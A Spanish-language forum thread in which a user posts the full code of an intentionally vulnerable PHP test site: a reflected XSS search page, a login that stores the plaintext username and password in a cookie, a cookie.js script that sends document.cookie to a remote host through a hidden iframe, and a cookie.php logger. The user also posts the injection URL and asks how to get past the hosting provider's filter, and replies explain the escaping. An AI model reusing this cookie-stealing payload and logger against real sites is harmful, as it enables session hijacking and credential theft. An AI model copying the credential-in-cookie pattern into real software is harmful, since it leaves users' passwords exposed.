Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@
los codigos son los siguientes:
webv.php
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario: <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>
busca.php
<?php
$bus = $_REQUEST['busca'];
echo ($bus);
?>
pag2.php
<?php
$user=$_POST['nombre'];
$pass = $_POST['password'];
if ($user == "franco" && $pass == "franco")
{
setcookie("senia", $user."-". $pass, time()+60*60*24*365, "/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>
cookie.js
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");
cookie.php
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt', 'a');
fwrite($file, $cookie.' - ');
fclose($file);
?>
esta es la url vulnerable a nivel localhost:
http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>
El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>
pero mi@ es el siguiente
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&h=pruebas18p.webcindario.com&t=1280371273&k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->
Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script
alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?
gracias :)
no se que filtro ni nada xD
pero prueba en este hosting www.zymic.com
para pruebas si que es bueno
saludos
no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)
igual gracias por la respuesta :)
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
No entiendo el porque escapas las comillas dobles. No debería ser así: (Además de cerrar bien la etiqueta <script>)
<script src="http://www.pruebas18p.webcindario.com/cookie.js"></script>
disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles :-[.
Podrias expresarte mejor ?
Muchas gracias
si pones un backslash delante de las comillas es para indicar que quieres mostrar ese carácter (las comillas) y no para delimitar un string.
creo que no me entendieron -.-
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script>
ese codigo lo añade mi arroba, yo pongo este:
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
yo no añado los backslashes, los añade mi arroba
PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras
Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...
Info:
http://foro.undersecurity.net/read.php?15,6470
Cita de: frankitox en 31 Julio 2010, 23:57 PMhttp://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
Analiza ese código y comparalo con este ejemplo.
<bHola</b>Está bien cerrada la etiqueta?
miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon :-[
Cita de: frankitox en 1 Agosto 2010, 04:32 AM
miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon :-[
lol, mejor piensa antes de postear...
Cita de: ~ Yoya ~ en 1 Agosto 2010, 02:12 AM
Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...
Info:
http://foro.undersecurity.net/read.php?15,6470